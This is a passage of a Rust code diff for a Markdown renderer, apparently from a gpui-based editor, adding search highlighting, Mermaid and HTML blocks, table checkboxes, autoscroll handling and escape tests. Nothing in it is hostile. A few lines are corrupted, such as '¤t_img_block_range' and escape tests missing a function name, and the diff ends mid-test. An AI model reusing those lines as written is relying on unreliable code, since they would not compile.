cx.focus_handle(); - let mut this = Self { + Self::new_with_options( source, - selection: Selection::default(), - pressed_link: None, - autoscroll_request: None, - should_reparse: false, - parsed_markdown: ParsedMarkdown::default(), - images_by_source_offset: Default::default(), - pending_parse: None, - focus_handle, - language_registry: None, - fallback_code_block_language: None, - options: Options { + None, + None, + MarkdownOptions { parse_links_only: true, + ..Default::default() }, - copied_code_blocks: HashSet::default(), - code_block_scroll_handles: HashMap::default(), - context_menu_selected_text: None, - }; - this.parse(cx); - this + cx, + ) } fn code_block_scroll_handle(&mut self, id: usize) -> ScrollHandle { @@ -364,6 +468,32 @@ impl Markdown { self.code_block_scroll_handles.clear(); } + fn autoscroll_code_block(&self, source_index: usize, cursor_position: Point) { + let Some((_, scroll_handle)) = self + .code_block_scroll_handles + .range(..=source_index) + .next_back() + else { + return; + }; + + let bounds = scroll_handle.bounds(); + if cursor_position.y < bounds.top() || cursor_position.y > bounds.bottom() { + return; + } + + let horizontal_delta = if cursor_position.x < bounds.left() { + bounds.left() - cursor_position.x + } else if cursor_position.x > bounds.right() { + bounds.right() - cursor_position.x + } else { + return; + }; + + let offset = scroll_handle.offset(); + scroll_handle.set_offset(point(offset.x + horizontal_delta, offset.y)); + } + pub fn is_parsing(&self) -> bool { self.pending_parse.is_some() } @@ -382,6 +512,30 @@ impl Markdown { self.parse(cx); } + pub fn request_autoscroll_to_source_index( + &mut self, + source_index: usize, + cx: &mut Context, + ) { + self.autoscroll_request = Some(source_index); + cx.refresh_windows(); + } + + pub fn set_active_root_for_source_index( + &mut self, + source_index: Option, + cx: &mut Context, + ) { + let active_root_block = + source_index.and_then(|index| self.parsed_markdown.root_block_for_source_index(index)); + if self.active_root_block == active_root_block { + return; + } + + self.active_root_block = active_root_block; + cx.notify(); + } + pub fn reset(&mut self, source: SharedString, cx: &mut Context) { if source == self.source() { return; @@ -391,6 +545,8 @@ impl Markdown { self.autoscroll_request = None; self.pending_parse = None; self.should_reparse = false; + self.search_highlights.clear(); + self.active_search_highlight = None; // Don't clear parsed_markdown here - keep existing content visible until new parse completes self.parse(cx); } @@ -401,30 +557,21 @@ impl Markdown { } pub fn escape(s: &str) -> Cow<'_, str> { - // Valid to use bytes since multi-byte UTF-8 doesn't use ASCII chars. - let count = s - .bytes() - .filter(|c| *c == b'\n' || c.is_ascii_punctuation()) - .count(); - if count > 0 { - let mut output = String::with_capacity(s.len() + count); - let mut is_newline = false; - for c in s.chars() { - if is_newline && c == ' ' { - continue; - } - is_newline = c == '\n'; - if c == '\n' { - output.push('\n') - } else if c.is_ascii_punctuation() { - output.push('\\') - } - output.push(c) - } - output.into() - } else { - s.into() + let output_len: usize = { + let mut escaper = MarkdownEscaper::new(); + s.bytes().map(|byte| escaper.next(byte).output_len()).sum() + }; + + if output_len == s.len() { + return s.into(); } + + let mut escaper = MarkdownEscaper::new(); + let mut output = String::with_capacity(output_len); + for c in s.chars() { + escaper.next(c as u8).write_to(c, &mut output); + } + output.into() } pub fn selected_text(&self) -> Option { @@ -435,6 +582,40 @@ impl Markdown { } } + pub fn set_search_highlights( + &mut self, + highlights: Vec>, + active: Option, + cx: &mut Context, + ) { + self.search_highlights = highlights; + self.active_search_highlight = active; + cx.notify(); + } + + pub fn clear_search_highlights(&mut self, cx: &mut Context) { + if !self.search_highlights.is_empty() || self.active_search_highlight.is_some() { + self.search_highlights.clear(); + self.active_search_highlight = None; + cx.notify(); + } + } + + pub fn set_active_search_highlight(&mut self, active: Option, cx: &mut Context) { + if self.active_search_highlight != active { + self.active_search_highlight = active; + cx.notify(); + } + } + + pub fn search_highlights(&self) -> &[Range] { + &self.search_highlights + } + + pub fn active_search_highlight(&self) -> Option { + self.active_search_highlight + } + fn copy(&self, text: &RenderedText, _: &mut Window, cx: &mut Context) { if self.selection.end <= self.selection.start { return; @@ -461,6 +642,17 @@ impl Markdown { fn parse(&mut self, cx: &mut Context) { if self.source.is_empty() { + self.should_reparse = false; + self.pending_parse.take(); + self.parsed_markdown = ParsedMarkdown { + source: self.source.clone(), + ..Default::default() + }; + self.active_root_block = None; + self.images_by_source_offset.clear(); + self.mermaid_state.clear(); + cx.notify(); + cx.refresh_windows(); return; } @@ -475,6 +667,8 @@ impl Markdown { fn start_background_parse(&self, cx: &Context) -> Task<()> { let source = self.source.clone(); let should_parse_links_only = self.options.parse_links_only; + let should_parse_html = self.options.parse_html; + let should_render_mermaid_diagrams = self.options.render_mermaid_diagrams; let language_registry = self.language_registry.clone(); let fallback = self.fallback_code_block_language.clone(); @@ -486,12 +680,25 @@ impl Markdown { source, languages_by_name: TreeMap::default(), languages_by_path: TreeMap::default(), + root_block_starts: Arc::default(), + html_blocks: BTreeMap::default(), + mermaid_diagrams: BTreeMap::default(), }, Default::default(), ); } - let (events, language_names, paths) = parse_markdown(&source); + let parsed = parse_markdown_with_options(&source, should_parse_html); + let events = parsed.events; + let language_names = parsed.language_names; + let paths = parsed.language_paths; + let root_block_starts = parsed.root_block_starts; + let html_blocks = parsed.html_blocks; + let mermaid_diagrams = if should_render_mermaid_diagrams { + extract_mermaid_diagrams(&source, &events) + } else { + BTreeMap::default() + }; let mut images_by_source_offset = HashMap::default(); let mut languages_by_name = TreeMap::default(); let mut languages_by_path = TreeMap::default(); @@ -550,6 +757,9 @@ impl Markdown { events: Arc::from(events), languages_by_name, languages_by_path, + root_block_starts: Arc::from(root_block_starts), + html_blocks, + mermaid_diagrams, }, images_by_source_offset, ) @@ -561,10 +771,22 @@ impl Markdown { this.update(cx, |this, cx| { this.parsed_markdown = parsed; this.images_by_source_offset = images_by_source_offset; + if this.active_root_block.is_some_and(|block_index| { + block_index >= this.parsed_markdown.root_block_starts.len() + }) { + this.active_root_block = None; + } + if this.options.render_mermaid_diagrams { + let parsed_markdown = this.parsed_markdown.clone(); + this.mermaid_state.update(&parsed_markdown, cx); + } else { + this.mermaid_state.clear(); + } this.pending_parse.take(); if this.should_reparse { this.parse(cx); } + cx.notify(); cx.refresh_windows(); }) .ok(); @@ -658,6 +880,9 @@ pub struct ParsedMarkdown { pub events: Arc<[(Range, MarkdownEvent)]>, pub languages_by_name: TreeMap>, pub languages_by_path: TreeMap, Arc>, + pub root_block_starts: Arc<[usize]>, + pub(crate) html_blocks: BTreeMap, + pub(crate) mermaid_diagrams: BTreeMap, } impl ParsedMarkdown { @@ -668,6 +893,30 @@ impl ParsedMarkdown { pub fn events(&self) -> &Arc<[(Range, MarkdownEvent)]> { &self.events } + + pub fn root_block_starts(&self) -> &Arc<[usize]> { + &self.root_block_starts + } + + pub fn root_block_for_source_index(&self, source_index: usize) -> Option { + if self.root_block_starts.is_empty() { + return None; + } + + let partition = self + .root_block_starts + .partition_point(|block_start| *block_start <= source_index); + + Some(partition.saturating_sub(1)) + } +} + +pub enum AutoscrollBehavior { + /// Propagate the request up the element tree for the nearest + /// scrollable ancestor (e.g. `List`) to handle. + Propagate, + /// Directly control a specific scroll handle. + Controlled(ScrollHandle), } pub struct MarkdownElement { @@ -675,6 +924,11 @@ pub struct MarkdownElement { style: MarkdownStyle, code_block_renderer: CodeBlockRenderer, on_url_click: Option>, + on_source_click: Option, + on_checkbox_toggle: Option, + image_resolver: Option Option>>, + show_root_block_markers: bool, + autoscroll: AutoscrollBehavior, } impl MarkdownElement { @@ -683,11 +937,15 @@ impl MarkdownElement { markdown, style, code_block_renderer: CodeBlockRenderer::Default { - copy_button: true, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::VisibleOnHover, border: false, }, on_url_click: None, + on_source_click: None, + on_checkbox_toggle: None, + image_resolver: None, + show_root_block_markers: false, + autoscroll: AutoscrollBehavior::Propagate, } } @@ -725,18 +983,159 @@ impl MarkdownElement { self } - fn paint_selection( + pub fn on_source_click( + mut self, + handler: impl Fn(usize, usize, &mut Window, &mut App) -> bool + 'static, + ) -> Self { + self.on_source_click = Some(Box::new(handler)); + self + } + + pub fn on_checkbox_toggle( + mut self, + handler: impl Fn(Range, bool, &mut Window, &mut App) + 'static, + ) -> Self { + self.on_checkbox_toggle = Some(Rc::new(handler)); + self + } + + pub fn image_resolver( + mut self, + resolver: impl Fn(&str) -> Option + 'static, + ) -> Self { + self.image_resolver = Some(Box::new(resolver)); + self + } + + pub fn show_root_block_markers(mut self) -> Self { + self.show_root_block_markers = true; + self + } + + pub fn scroll_handle(mut self, scroll_handle: ScrollHandle) -> Self { + self.autoscroll = AutoscrollBehavior::Controlled(scroll_handle); + self + } + + fn push_markdown_image( &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + source: ImageSource, + width: Option, + height: Option, + ) { + builder.modify_current_div(|el| { + el.items_center().flex().flex_row().child( + img(source) + .max_w_full() + .when_some(height, |this, height| this.h(height)) + .when_some(width, |this, width| this.w(width)), + ) + }); + let _ = range; + } + + fn push_markdown_paragraph( + &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + markdown_end: usize, + ) { + builder.push_div( + div().when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_2().line_height(rems(1.3)) + }), + range, + markdown_end, + ); + } + + fn push_markdown_heading( + &self, + builder: &mut MarkdownElementBuilder, + level: pulldown_cmark::HeadingLevel, + range: &Range, + markdown_end: usize, + ) { + let mut heading = div().mb_2(); + heading = apply_heading_style(heading, level, self.style.heading_level_styles.as_ref()); + + let mut heading_style = self.style.heading.clone(); + let heading_text_style = heading_style.text_style().clone(); + heading.style().refine(&heading_style); + + builder.push_text_style(heading_text_style); + builder.push_div(heading, range, markdown_end); + } + + fn pop_markdown_heading(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_text_style(); + } + + fn push_markdown_block_quote( + &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + markdown_end: usize, + ) { + builder.push_text_style(self.style.block_quote.clone()); + builder.push_div( + div() + .pl_4() + .mb_2() + .border_l_4() + .border_color(self.style.block_quote_border_color), + range, + markdown_end, + ); + } + + fn pop_markdown_block_quote(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_text_style(); + } + + fn push_markdown_list_item( + &self, + builder: &mut MarkdownElementBuilder, + bullet: AnyElement, + range: &Range, + markdown_end: usize, + ) { + builder.push_div( + div() + .when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_1().gap_1().line_height(rems(1.3)) + }) + .h_flex() + .items_start() + .child(bullet), + range, + markdown_end, + ); + // Without `w_0`, text doesn't wrap to the width of the container. + builder.push_div(div().flex_1().w_0(), range, markdown_end); + } + + fn pop_markdown_list_item(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_div(); + } + + fn paint_highlight_range( bounds: Bounds, + start: usize, + end: usize, + color: Hsla, rendered_text: &RenderedText, window: &mut Window, - cx: &mut App, ) { - let selection = self.markdown.read(cx).selection.clone(); - let selection_start = rendered_text.position_for_source_index(selection.start); - let selection_end = rendered_text.position_for_source_index(selection.end); + let start_pos = rendered_text.position_for_source_index(start); + let end_pos = rendered_text.position_for_source_index(end); if let Some(((start_position, start_line_height), (end_position, end_line_height))) = - selection_start.zip(selection_end) + start_pos.zip(end_pos) { if start_position.y == end_position.y { window.paint_quad(quad( @@ -745,7 +1144,7 @@ impl MarkdownElement { point(end_position.x, end_position.y + end_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -757,7 +1156,7 @@ impl MarkdownElement { point(bounds.right(), start_position.y + start_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -770,7 +1169,7 @@ impl MarkdownElement { point(bounds.right(), end_position.y), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -783,7 +1182,7 @@ impl MarkdownElement { point(end_position.x, end_position.y + end_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -792,6 +1191,52 @@ impl MarkdownElement { } } + fn paint_selection( + &self, + bounds: Bounds, + rendered_text: &RenderedText, + window: &mut Window, + cx: &mut App, + ) { + let selection = self.markdown.read(cx).selection.clone(); + Self::paint_highlight_range( + bounds, + selection.start, + selection.end, + self.style.selection_background_color, + rendered_text, + window, + ); + } + + fn paint_search_highlights( + &self, + bounds: Bounds, + rendered_text: &RenderedText, + window: &mut Window, + cx: &mut App, + ) { + let markdown = self.markdown.read(cx); + let active_index = markdown.active_search_highlight; + let colors = cx.theme().colors(); + + for (i, highlight_range) in markdown.search_highlights.iter().enumerate() { + let color = if Some(i) == active_index { + colors.search_active_match_background + } else { + colors.search_match_background + }; + Self::paint_highlight_range( + bounds, + highlight_range.start, + highlight_range.end, + color, + rendered_text, + window, + ); + } + } + fn paint_mouse_listeners( &mut self, hitbox: &Hitbox, @@ -818,6 +1263,7 @@ impl MarkdownElement { } let on_open_url = self.on_url_click.take(); + let on_source_click = self.on_source_click.take(); self.on_mouse_event(window, cx, { let hitbox = hitbox.clone(); @@ -845,6 +1291,16 @@ impl MarkdownElement { match rendered_text.source_index_for_position(event.position) { Ok(ix) | Err(ix) => ix, }; + if let Some(handler) = on_source_click.as_ref() { + let blocked = handler(source_index, event.click_count, window, cx); + if blocked { + markdown.selection = Selection::default(); + markdown.pressed_link = None; + window.prevent_default(); + cx.notify(); + return; + } + } let (range, mode) = match event.click_count { 1 => { let range = source_index..source_index; @@ -902,6 +1358,7 @@ impl MarkdownElement { Ok(ix) | Err(ix) => ix, }; markdown.selection.set_head(source_index, &rendered_text); + markdown.autoscroll_code_block(source_index, event.position); markdown.autoscroll_request = Some(source_index); cx.notify(); } else { @@ -951,14 +1408,38 @@ impl MarkdownElement { .update(cx, |markdown, _| markdown.autoscroll_request.take())?; let (position, line_height) = rendered_text.position_for_source_index(autoscroll_index)?; - let text_style = self.style.base_text_style.clone(); - let font_id = window.text_system().resolve_font(&text_style.font()); - let font_size = text_style.font_size.to_pixels(window.rem_size()); - let em_width = window.text_system().em_width(font_id, font_size).unwrap(); - window.request_autoscroll(Bounds::from_corners( - point(position.x - 3. * em_width, position.y - 3. * line_height), - point(position.x + 3. * em_width, position.y + 3. * line_height), - )); + match &self.autoscroll { + AutoscrollBehavior::Controlled(scroll_handle) => { + let viewport = scroll_handle.bounds(); + let margin = line_height * 3.; + let top_goal = viewport.top() + margin; + let bottom_goal = viewport.bottom() - margin; + let current_offset = scroll_handle.offset(); + + let new_offset_y = if position.y < top_goal { + current_offset.y + (top_goal - position.y) + } else if position.y + line_height > bottom_goal { + current_offset.y + (bottom_goal - (position.y + line_height)) + } else { + current_offset.y + }; + + scroll_handle.set_offset(point( + current_offset.x, + new_offset_y.clamp(-scroll_handle.max_offset().y, Pixels::ZERO), + )); + } + AutoscrollBehavior::Propagate => { + let text_style = self.style.base_text_style.clone(); + let font_id = window.text_system().resolve_font(&text_style.font()); + let font_size = text_style.font_size.to_pixels(window.rem_size()); + let em_width = window.text_system().em_width(font_id, font_size).unwrap(); + window.request_autoscroll(Bounds::from_corners( + point(position.x - 3. * em_width, position.y - 3. * line_height), + point(position.x + 3. * em_width, position.y + 3. * line_height), + )); + } + } Some(()) } @@ -1010,11 +1491,14 @@ impl Element for MarkdownElement { self.style.base_text_style.clone(), self.style.syntax.clone(), ); - let (parsed_markdown, images) = { + let (parsed_markdown, images, active_root_block, render_mermaid_diagrams, mermaid_state) = { let markdown = self.markdown.read(cx); ( markdown.parsed_markdown.clone(), markdown.images_by_source_offset.clone(), + markdown.active_root_block, + markdown.options.render_mermaid_diagrams, + markdown.mermaid_state.clone(), ) }; let markdown_end = if let Some(last) = parsed_markdown.events.last() { @@ -1025,6 +1509,8 @@ impl Element for MarkdownElement { let mut code_block_ids = HashSet::default(); let mut current_img_block_range: Option> = None; + let mut handled_html_block = false; + let mut rendered_mermaid_block = false; for (index, (range, event)) in parsed_markdown.events.iter().enumerate() { // Skip alt text for images that rendered if let Some(current_img_block_range) = ¤t_img_block_range @@ -1033,58 +1519,83 @@ impl Element for MarkdownElement { continue; } + if handled_html_block { + if let MarkdownEvent::End(MarkdownTagEnd::HtmlBlock) = event { + handled_html_block = false; + } else { + continue; + } + } + + if rendered_mermaid_block { + if matches!(event, MarkdownEvent::End(MarkdownTagEnd::CodeBlock)) { + rendered_mermaid_block = false; + } + continue; + } + match event { + MarkdownEvent::RootStart => { + if self.show_root_block_markers { + builder.push_root_block(range, markdown_end); + } + } + MarkdownEvent::RootEnd(root_block_index) => { + if self.show_root_block_markers { + builder.pop_root_block( + active_root_block == Some(*root_block_index), + cx.theme().colors().border, + cx.theme().colors().border_variant, + ); + } + } MarkdownEvent::Start(tag) => { match tag { - MarkdownTag::Image { .. } => { + MarkdownTag::Image { dest_url, .. } => { if let Some(image) = images.get(&range.start) { current_img_block_range = Some(range.clone()); - builder.modify_current_div(|el| { - el.items_center() - .flex() - .flex_row() - .child(img(image.clone())) - }); + self.push_markdown_image( + &mut builder, + range, + image.clone().into(), + None, + None, + ); + } else if let Some(source) = self + .image_resolver + .as_ref() + .and_then(|resolve| resolve(dest_url.as_ref())) + { + current_img_block_range = Some(range.clone()); + self.push_markdown_image(&mut builder, range, source, None, None); } } MarkdownTag::Paragraph => { - builder.push_div( - div().when(!self.style.height_is_multiple_of_line_height, |el| { - el.mb_2().line_height(rems(1.3)) - }), - range, - markdown_end, - ); + self.push_markdown_paragraph(&mut builder, range, markdown_end); } MarkdownTag::Heading { level, .. } => { - let mut heading = div().mb_2(); - - heading = apply_heading_style( - heading, - *level, - self.style.heading_level_styles.as_ref(), - ); - - heading.style().refine(&self.style.heading); - - let text_style = self.style.heading.text_style().clone(); - - builder.push_text_style(text_style); - builder.push_div(heading, range, markdown_end); + self.push_markdown_heading(&mut builder, *level, range, markdown_end); } MarkdownTag::BlockQuote => { - builder.push_text_style(self.style.block_quote.clone()); - builder.push_div( - div() - .pl_4() - .mb_2() - .border_l_4() - .border_color(self.style.block_quote_border_color), - range, - markdown_end, - ); + self.push_markdown_block_quote(&mut builder, range, markdown_end); } MarkdownTag::CodeBlock { kind, .. } => { + if render_mermaid_diagrams + && let Some(mermaid_diagram) = + parsed_markdown.mermaid_diagrams.get(&range.start) + { + builder.push_sourced_element( + mermaid_diagram.content_range.clone(), + render_mermaid_diagram( + mermaid_diagram, + &mermaid_state, + &self.style, + ), + ); + rendered_mermaid_block = true; + continue; + } + let language = match kind { CodeBlockKind::Fenced => None, CodeBlockKind::FencedLang(language) => { @@ -1168,46 +1679,57 @@ impl Element for MarkdownElement { (CodeBlockRenderer::Custom { .. }, _) => {} } } - MarkdownTag::HtmlBlock => builder.push_div(div(), range, markdown_end), + MarkdownTag::HtmlBlock => { + builder.push_div(div(), range, markdown_end); + if let Some(block) = parsed_markdown.html_blocks.get(&range.start) { + self.render_html_block(block, &mut builder, markdown_end, cx); + handled_html_block = true; + } + } MarkdownTag::List(bullet_index) => { builder.push_list(*bullet_index); builder.push_div(div().pl_2p5(), range, markdown_end); } MarkdownTag::Item => { - let bullet = if let Some((_, MarkdownEvent::TaskListMarker(checked))) = - parsed_markdown.events.get(index.saturating_add(1)) - { - let source = &parsed_markdown.source()[range.clone()]; - - Checkbox::new( - ElementId::Name(source.to_string().into()), - if *checked { + let bullet = + if let Some((task_range, MarkdownEvent::TaskListMarker(checked))) = + parsed_markdown.events.get(index.saturating_add(1)) + { + let source = &parsed_markdown.source()[range.clone()]; + let checked = *checked; + let toggle_state = if checked { ToggleState::Selected } else { ToggleState::Unselected - }, - ) - .fill() - .visualization_only(true) - .into_any_element() - } else if let Some(bullet_index) = builder.next_bullet_index() { - div().child(format!("{}.", bullet_index)).into_any_element() - } else { - div().child("•").into_any_element() - }; - builder.push_div( - div() - .when(!self.style.height_is_multiple_of_line_height, |el| { - el.mb_1().gap_1().line_height(rems(1.3)) - }) - .h_flex() - .items_start() - .child(bullet), - range, - markdown_end, - ); - // Without `w_0`, text doesn't wrap to the width of the container. - builder.push_div(div().flex_1().w_0(), range, markdown_end); + }; + + let checkbox = Checkbox::new( + ElementId::Name(source.to_string().into()), + toggle_state, + ) + .fill(); + + if let Some(on_toggle) = self.on_checkbox_toggle.clone() { + let task_source_range = task_range.clone(); + checkbox + .on_click(move |_state, window, cx| { + on_toggle( + task_source_range.clone(), + !checked, + window, + cx, + ); + }) + .into_any_element() + } else { + checkbox.visualization_only(true).into_any_element() + } + } else if let Some(bullet_index) = builder.next_bullet_index() { + div().child(format!("{}.", bullet_index)).into_any_element() + } else { + div().child("•").into_any_element() + }; + self.push_markdown_list_item(&mut builder, bullet, range, markdown_end); } MarkdownTag::Emphasis => builder.push_text_style(TextStyleRefinement { font_style: Some(FontStyle::Italic), @@ -1307,12 +1829,10 @@ impl Element for MarkdownElement { builder.pop_div(); } MarkdownTagEnd::Heading(_) => { - builder.pop_div(); - builder.pop_text_style() + self.pop_markdown_heading(&mut builder); } MarkdownTagEnd::BlockQuote(_kind) => { - builder.pop_text_style(); - builder.pop_div() + self.pop_markdown_block_quote(&mut builder); } MarkdownTagEnd::CodeBlock => { builder.trim_trailing_newline(); @@ -1322,38 +1842,10 @@ impl Element for MarkdownElement { builder.pop_text_style(); if let CodeBlockRenderer::Default { - copy_button: true, .. - } = &self.code_block_renderer - { - builder.modify_current_div(|el| { - let content_range = parser::extract_code_block_content_range( - &parsed_markdown.source()[range.clone()], - ); - let content_range = content_range.start + range.start - ..content_range.end + range.start; - - let code = parsed_markdown.source()[content_range].to_string(); - let codeblock = render_copy_code_block_button( - range.end, - code, - self.markdown.clone(), - ); - el.child( - h_flex() - .w_4() - .absolute() - .top_1p5() - .right_1p5() - .justify_end() - .child(codeblock), - ) - }); - } - - if let CodeBlockRenderer::Default { - copy_button_on_hover: true, + copy_button_visibility, .. } = &self.code_block_renderer + && *copy_button_visibility != CopyButtonVisibility::Hidden { builder.modify_current_div(|el| { let content_range = parser::extract_code_block_content_range( @@ -1372,10 +1864,17 @@ impl Element for MarkdownElement { h_flex() .w_4() .absolute() - .top_0() - .right_0() .justify_end() - .visible_on_hover("code_block") + .when_else( + *copy_button_visibility + == CopyButtonVisibility::VisibleOnHover, + |this| { + this.top_0() + .right_0() + .visible_on_hover("code_block") + }, + |this| this.top_1p5().right_1p5(), + ) .child(codeblock), ) }); @@ -1390,8 +1889,7 @@ impl Element for MarkdownElement { builder.pop_div(); } MarkdownTagEnd::Item => { - builder.pop_div(); - builder.pop_div(); + self.pop_markdown_list_item(&mut builder); } MarkdownTagEnd::Emphasis => builder.pop_text_style(), MarkdownTagEnd::Strong => builder.pop_text_style(), @@ -1413,6 +1911,7 @@ impl Element for MarkdownElement { builder.table.end_row(); } MarkdownTagEnd::TableCell => { + builder.replace_pending_checkbox(range); builder.pop_div(); builder.table.end_cell(); } @@ -1542,6 +2041,7 @@ impl Element for MarkdownElement { self.paint_mouse_listeners(hitbox, &rendered_markdown.text, window, cx); rendered_markdown.element.paint(window, cx); + self.paint_search_highlights(bounds, &rendered_markdown.text, window, cx); self.paint_selection(bounds, &rendered_markdown.text, window, cx); } } @@ -1807,6 +2307,15 @@ impl MarkdownElementBuilder { self.div_stack.push(div); } + fn push_root_block(&mut self, range: &Range, markdown_end: usize) { + self.push_div( + div().group("markdown-root-block").relative(), + range, + markdown_end, + ); + self.push_div(div().pl_4(), range, markdown_end); + } + fn modify_current_div(&mut self, f: impl FnOnce(AnyDiv) -> AnyDiv) { self.flush_text(); if let Some(div) = self.div_stack.pop() { @@ -1814,12 +2323,53 @@ impl MarkdownElementBuilder { } } + fn pop_root_block( + &mut self, + is_active: bool, + active_gutter_color: Hsla, + hovered_gutter_color: Hsla, + ) { + self.pop_div(); + self.modify_current_div(|el| { + el.child( + div() + .h_full() + .w(px(4.0)) + .when(is_active, |this| this.bg(active_gutter_color)) + .group_hover("markdown-root-block", |this| { + if is_active { + this + } else { + this.bg(hovered_gutter_color) + } + }) + .rounded_xs() + .absolute() + .left_0() + .top_0(), + ) + }); + self.pop_div(); + } + fn pop_div(&mut self) { self.flush_text(); let div = self.div_stack.pop().unwrap().into_any_element(); self.div_stack.last_mut().unwrap().extend(iter::once(div)); } + fn push_sourced_element(&mut self, source_range: Range, element: impl Into) { + self.flush_text(); + let anchor = self.render_source_anchor(source_range); + self.div_stack.last_mut().unwrap().extend([{ + div() + .relative() + .child(anchor) + .child(element.into()) + .into_any_element() + }]); + } + fn push_list(&mut self, bullet_index: Option) { self.list_stack.push(ListStackEntry { bullet_index }); } @@ -1869,9 +2419,10 @@ impl MarkdownElementBuilder { } let mut run_style = self.text_style(); - if let Some(highlight) = highlight_id.style(&self.syntax_theme) { + if let Some(highlight) = self.syntax_theme.get(highlight_id).cloned() { run_style = run_style.highlight(highlight); } + self.pending_line.runs.push(run_style.to_run(range.len())); offset = range.end; } @@ -1898,6 +2449,51 @@ impl MarkdownElementBuilder { } } + fn replace_pending_checkbox(&mut self, source_range: &Range) { + let trimmed = self.pending_line.text.trim(); + if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { + let checked = trimmed != "[ ]"; + self.pending_line = PendingLine::default(); + let checkbox = Checkbox::new( + ElementId::Name( + format!("table_checkbox_{}_{}", source_range.start, source_range.end).into(), + ), + if checked { + ToggleState::Selected + } else { + ToggleState::Unselected + }, + ) + .fill() + .visualization_only(true) + .into_any_element(); + self.div_stack.last_mut().unwrap().extend([checkbox]); + } + } + + fn render_source_anchor(&mut self, source_range: Range) -> AnyElement { + let mut text_style = self.base_text_style.clone(); + text_style.color = Hsla::transparent_black(); + let text = "\u{200B}"; + let styled_text = StyledText::new(text).with_runs(vec![text_style.to_run(text.len())]); + self.rendered_lines.push(RenderedLine { + layout: styled_text.layout().clone(), + source_mappings: vec![SourceMapping { + rendered_index: 0, + source_index: source_range.start, + }], + source_end: source_range.end, + language: None, + }); + div() + .absolute() + .top_0() + .left_0() + .opacity(0.) + .child(styled_text) + .into_any_element() + } + fn flush_text(&mut self) { let line = mem::take(&mut self.pending_line); if line.text.is_empty() { @@ -1947,7 +2543,7 @@ impl RenderedLine { Ok(ix) => &self.source_mappings[ix], Err(ix) => &self.source_mappings[ix - 1], }; - mapping.rendered_index + (source_index - mapping.source_index) + (mapping.rendered_index + (source_index - mapping.source_index)).min(self.layout.len()) } fn source_index_for_rendered_index(&self, rendered_index: usize) -> usize { @@ -2211,7 +2807,7 @@ mod tests { settings::init(cx); } if !cx.has_global::() { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); } }); } @@ -2275,6 +2871,15 @@ mod tests { markdown: &str, language_registry: Option>, cx: &mut TestAppContext, + ) -> RenderedText { + render_markdown_with_options(markdown, language_registry, MarkdownOptions::default(), cx) + } + + fn render_markdown_with_options( + markdown: &str, + language_registry: Option>, + options: MarkdownOptions, + cx: &mut TestAppContext, ) -> RenderedText { struct TestWindow; @@ -2287,8 +2892,15 @@ mod tests { ensure_theme_initialized(cx); let (_, cx) = cx.add_window_view(|_, _| TestWindow); - let markdown = - cx.new(|cx| Markdown::new(markdown.to_string().into(), language_registry, None, cx)); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + markdown.to_string().into(), + language_registry, + None, + options, + cx, + ) + }); cx.run_until_parked(); let (rendered, _) = cx.draw( Default::default(), @@ -2296,8 +2908,7 @@ mod tests { |_window, _cx| { MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::Hidden, border: false, }, ) @@ -2465,6 +3076,48 @@ mod tests { assert_eq!(second_word, "b"); } + #[test] + fn test_table_checkbox_detection() { + let md = "| Done |\n|------|\n| [x] |\n| [ ] |"; + let events = crate::parser::parse_markdown_with_options(md, false).events; + + let mut in_table = false; + let mut cell_texts: Vec = Vec::new(); + let mut current_cell = String::new(); + + for (range, event) in &events { + match event { + MarkdownEvent::Start(MarkdownTag::Table(_)) => in_table = true, + MarkdownEvent::End(MarkdownTagEnd::Table) => in_table = false, + MarkdownEvent::Start(MarkdownTag::TableCell) => current_cell.clear(), + MarkdownEvent::End(MarkdownTagEnd::TableCell) => { + if in_table { + cell_texts.push(current_cell.clone()); + } + } + MarkdownEvent::Text if in_table => { + current_cell.push_str(&md[range.clone()]); + } + _ => {} + } + } + + let checkbox_cells: Vec<&String> = cell_texts + .iter() + .filter(|t| { + let trimmed = t.trim(); + trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" + }) + .collect(); + assert_eq!( + checkbox_cells.len(), + 2, + "Expected 2 checkbox cells, got: {cell_texts:?}" + ); + assert_eq!(checkbox_cells[0].trim(), "[x]"); + assert_eq!(checkbox_cells[1].trim(), "[ ]"); + } + #[gpui::test] fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) { // Test that double-clicking on inline code selects just the code content, @@ -2576,13 +3229,118 @@ mod tests { ); } + fn nbsp(n: usize) -> String { + "\u{00A0}".repeat(n) + } + + #[test] + fn test_escape_plain_text() { + assert_eq!(Markdown::escape("hello world"), "hello world"); + assert_eq!(Markdown::escape(""), ""); + assert_eq!(Markdown::escape("café ☕ naïve"), "café ☕ naïve"); + } + + #[test] + fn test_escape_punctuation() { + assert_eq!(Markdown::escape("hello `world`"), r"hello \`world\`"); + assert_eq!(Markdown::escape("a|b"), r"a\|b"); + } + #[test] - fn test_escape() { - assert_eq!(Markdown::escape("hello `world`"), "hello \\`world\\`"); + fn test_escape_leading_spaces() { + assert_eq!(Markdown::escape(" hello"), [ (4), "hello"].concat()); + assert_eq!( + Markdown::escape(" | { a: string }"), + [ (4), r"\| \{ a\: string \}"].concat() + ); assert_eq!( - Markdown::escape("hello\n cool world"), - "hello\n\ncool world" + 